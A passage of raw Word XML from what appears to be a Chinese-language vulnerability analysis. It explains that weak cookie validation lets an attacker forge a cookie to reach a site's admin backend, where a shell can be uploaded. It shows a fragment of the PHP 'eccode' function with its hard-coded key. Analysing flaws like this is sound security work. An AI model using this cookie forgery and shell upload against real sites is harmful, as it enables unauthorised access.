          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>验证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>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-55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有效性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>导</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>致攻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>者可以通</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>过伪</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>造</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="50"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>陆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="51" w:line="583" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="4448"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:group id="_x0000_s8233" style="position:absolute;left:0;text-align:left;margin-left:80.6pt;margin-top:83.95pt;width:337.75pt;height:165.2pt;z-index:-365128;mso-position-horizontal-relative:page" coordorigin="1612,1679" coordsize="6755,3304">
            <v:rect id="_x0000_s8381" style="position:absolute;left:1617;top:1684;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8380" style="position:absolute;left:1797;top:1927;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8379" style="position:absolute;left:2761;top:1927;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8378" style="position:absolute;left:2861;top:1927;width:1807;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8377" style="position:absolute;left:4668;top:1927;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8376" style="position:absolute;left:4768;top:1927;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8375" style="position:absolute;left:5973;top:1927;width:101;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8374" style="position:absolute;left:6074;top:1927;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8373" style="position:absolute;left:6194;top:1927;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8372" style="position:absolute;left:6294;top:1927;width:1085;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8371" style="position:absolute;left:7379;top:1927;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8370" style="position:absolute;left:7479;top:1927;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8369" style="position:absolute;left:7961;top:1927;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8368" style="position:absolute;left:8061;top:1927;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8367" style="position:absolute;left:8181;top:1927;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8366" style="position:absolute;left:1617;top:2190;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8365" style="position:absolute;left:1797;top:2253;width:3012;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8364" style="position:absolute;left:4809;top:2253;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8363" style="position:absolute;left:4930;top:2253;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8362" style="position:absolute;left:5773;top:2253;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8361" style="position:absolute;left:5894;top:2253;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8360" style="position:absolute;left:6014;top:2253;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8359" style="position:absolute;left:6135;top:2253;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8358" style="position:absolute;left:6737;top:2253;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8357" style="position:absolute;left:6858;top:2253;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8356" style="position:absolute;left:1617;top:2516;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s8355" type="#_x0000_t75" style="position:absolute;left:1797;top:2579;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s8354" style="position:absolute;left:2197;top:2579;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8353" style="position:absolute;left:3040;top:2579;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8352" style="position:absolute;left:3161;top:2579;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8351" style="position:absolute;left:3281;top:2579;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8350" style="position:absolute;left:3402;top:2579;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8349" style="position:absolute;left:1617;top:2842;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8348" style="position:absolute;left:1797;top:2905;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8347" style="position:absolute;left:1897;top:2905;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8346" style="position:absolute;left:1997;top:2905;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8345" style="position:absolute;left:2097;top:2905;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8344" style="position:absolute;left:2197;top:2905;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8343" style="position:absolute;left:2438;top:2905;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8342" style="position:absolute;left:2558;top:2905;width:1326;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8341" style="position:absolute;left:3884;top:2905;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8340" style="position:absolute;left:4004;top:2905;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8339" style="position:absolute;left:4245;top:2905;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8338" style="position:absolute;left:4366;top:2905;width:1084;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8337" style="position:absolute;left:5450;top:2905;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8336" style="position:absolute;left:5571;top:2905;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8335" style="position:absolute;left:1617;top:3168;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8334" style="position:absolute;left:1797;top:3231;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8333" style="position:absolute;left:1897;top:3231;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8332" style="position:absolute;left:1997;top:3231;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8331" style="position:absolute;left:2097;top:3231;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8330" style="position:absolute;left:2197;top:3231;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8329" style="position:absolute;left:2297;top:3231;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8328" style="position:absolute;left:2397;top:3231;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8327" style="position:absolute;left:2497;top:3231;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8326" style="position:absolute;left:2597;top:3231;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8325" style="position:absolute;left:2958;top:3231;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8324" style="position:absolute;left:3079;top:3231;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8323" style="position:absolute;left:3440;top:3231;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8322" style="position:absolute;left:3561;top:3231;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8321" style="position:absolute;left:3681;top:3231;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8320" style="position:absolute;left:3802;top:3231;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8319" style="position:absolute;left:4043;top:3231;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8318" style="position:absolute;left:4163;top:3231;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8317" style="position:absolute;left:4404;top:3231;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8316" style="position:absolute;left:4525;top:3231;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8315" style="position:absolute;left:4645;top:3231;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8314" style="position:absolute;left:4766;top:3231;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8313" style="position:absolute;left:6694;top:3231;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8312" style="position:absolute;left:6814;top:3231;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8311" style="position:absolute;left:7417;top:3231;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8310" style="position:absolute;left:7537;top:3231;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8309" style="position:absolute;left:1617;top:3494;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8308" style="position:absolute;left:1797;top:3557;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8307" style="position:absolute;left:1897;top:3557;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8306" style="position:absolute;left:1997;top:3557;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8305" style="position:absolute;left:2097;top:3557;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8304" style="position:absolute;left:2197;top:3557;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8303" style="position:absolute;left:2297;top:3557;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8302" style="position:absolute;left:2397;top:3557;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8301" style="position:absolute;left:2497;top:3557;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8300" style="position:absolute;left:2597;top:3557;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8299" style="position:absolute;left:2697;top:3557;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8298" style="position:absolute;left:2797;top:3557;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8297" style="position:absolute;left:2897;top:3557;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8296" style="position:absolute;left:2997;top:3557;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8295" style="position:absolute;left:3599;top:3557;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8294" style="position:absolute;left:3720;top:3557;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8293" style="position:absolute;left:3840;top:3557;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8292" style="position:absolute;left:3961;top:3557;width:1807;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8291" style="position:absolute;left:5768;top:3557;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8290" style="position:absolute;left:5889;top:3557;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8289" style="position:absolute;left:6250;top:3557;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8288" style="position:absolute;left:6371;top:3557;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8287" style="position:absolute;left:1617;top:3820;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8286" style="position:absolute;left:1797;top:3883;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8285" style="position:absolute;left:1897;top:3883;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8284" style="position:absolute;left:1997;top:3883;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8283" style="position:absolute;left:2097;top:3883;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8282" style="position:absolute;left:2197;top:3883;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8281" style="position:absolute;left:2297;top:3883;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8280" style="position:absolute;left:2397;top:3883;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8279" style="position:absolute;left:2497;top:3883;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8278" style="position:absolute;left:2597;top:3883;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8277" style="position:absolute;left:2697;top:3883;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8276" style="position:absolute;left:2797;top:3883;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8275" style="position:absolute;left:2897;top:3883;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8274" style="position:absolute;left:2997;top:3883;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8273" style="position:absolute" from="4001,3883" to="4001,4083" strokecolor="#f8f8f8" strokeweight="4pt"/>
            <v:rect id="_x0000_s8272" style="position:absolute;left:4041;top:3883;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8271" style="position:absolute" from="4203,3883" to="4203,4083" strokecolor="#f8f8f8" strokeweight="4.05pt"/>
            <v:rect id="_x0000_s8270" style="position:absolute;left:4243;top:3883;width:1446;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8269" style="position:absolute" from="5729,3883" to="5729,4083" strokecolor="#f8f8f8" strokeweight="4.05pt"/>
            <v:rect id="_x0000_s8268" style="position:absolute;left:5770;top:3883;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8267" style="position:absolute" from="6171,3883" to="6171,4083" strokecolor="#f8f8f8" strokeweight="4.05pt"/>
            <v:rect id="_x0000_s8266" style="position:absolute;left:6212;top:3883;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8265" style="position:absolute" from="6374,3883" to="6374,4083" strokecolor="#f8f8f8" strokeweight="4.05pt"/>
            <v:rect id="_x0000_s8264" style="position:absolute;left:6414;top:3883;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8263" style="position:absolute" from="8020,3883" to="8020,4083" strokecolor="#f8f8f8" strokeweight="4.05pt"/>
            <v:rect id="_x0000_s8262" style="position:absolute;left:8061;top:3883;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8261" style="position:absolute;left:8181;top:3883;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8260" style="position:absolute;left:1617;top:4146;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8259" style="position:absolute;left:1797;top:4209;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8258" style="position:absolute;left:2038;top:4209;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8257" style="position:absolute;left:2158;top:4209;width:362;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8256" style="position:absolute;left:1617;top:4472;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8255" style="position:absolute;left:1797;top:4535;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8254" style="position:absolute;left:1897;top:4535;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8253" style="position:absolute;left:1997;top:4535;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8252" style="position:absolute;left:2097;top:4535;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8251" style="position:absolute;left:2197;top:4535;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8250" style="position:absolute;left:2297;top:4535;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8249" style="position:absolute;left:2397;top:4535;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8248" style="position:absolute;left:2497;top:4535;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8247" style="position:absolute;left:2597;top:4535;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8246" style="position:absolute;left:2697;top:4535;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8245" style="position:absolute;left:2797;top:4535;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8244" style="position:absolute;left:2897;top:4535;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8243" style="position:absolute;left:2997;top:4535;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8242" style="position:absolute;left:3599;top:4535;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8241" style="position:absolute;left:3720;top:4535;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8240" style="position:absolute;left:3840;top:4535;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8239" style="position:absolute;left:3961;top:4535;width:1687;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8238" style="position:absolute;left:5648;top:4535;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8237" style="position:absolute;left:5768;top:4535;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8236" style="position:absolute;left:5889;top:4535;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8235" style="position:absolute;left:6009;top:4535;width:1808;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s8234" type="#_x0000_t202" style="position:absolute;left:1614;top:1681;width:6750;height:3299" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="11"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Verdana"/>
                        <w:sz w:val="19"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="1" w:line="391" w:lineRule="auto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eccode($string,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$operation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2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'DECODE',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$key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 '@LFK24s224%@safS3s%1f%'</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>, $mcrype = true)</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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 = null;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($operation == 'ENCODE') {</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124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strlen($string); $i++) {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$string, $i, 1);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$keychar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$key,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($i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%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strlen($key))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-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1, 1);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chr(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ord($char) + ord($keychar));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Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台可以上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面一步一步来看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首先是加解密函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-58"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>eccode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="583" w:lineRule="auto"/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group id="_x0000_s7917" style="width:337.75pt;height:393.4pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6755,7868">
            <v:rect id="_x0000_s8232" style="position:absolute;left:5;top:5;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8231" style="position:absolute;left:185;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8230" style="position:absolute;left:285;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8229" style="position:absolute;left:385;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8228" style="position:absolute;left:485;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8227" style="position:absolute;left:585;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8226" style="position:absolute;left:685;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8225" style="position:absolute;left:785;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8224" style="position:absolute;left:885;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8223" style="position:absolute;left:985;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8222" style="position:absolute;left:1085;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8221" style="position:absolute;left:1185;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8220" style="position:absolute;left:1285;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8219" style="position:absolute;left:1385;top:248;width:1807;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8218" style="position:absolute;left:5;top:511;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8217" style="position:absolute;left:185;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8216" style="position:absolute;left:285;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8215" style="position:absolute;left:385;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8214" style="position:absolute;left:485;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8213" style="position:absolute;left:585;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8212" style="position:absolute;left:685;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8211" style="position:absolute;left:785;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8210" style="position:absolute;left:885;top:574;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8209" style="position:absolute;left:985;top:574;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8208" style="position:absolute;left:5;top:837;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8207" style="position:absolute;left:185;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8206" style="position:absolute;left:285;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8205" style="position:absolute;left:385;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
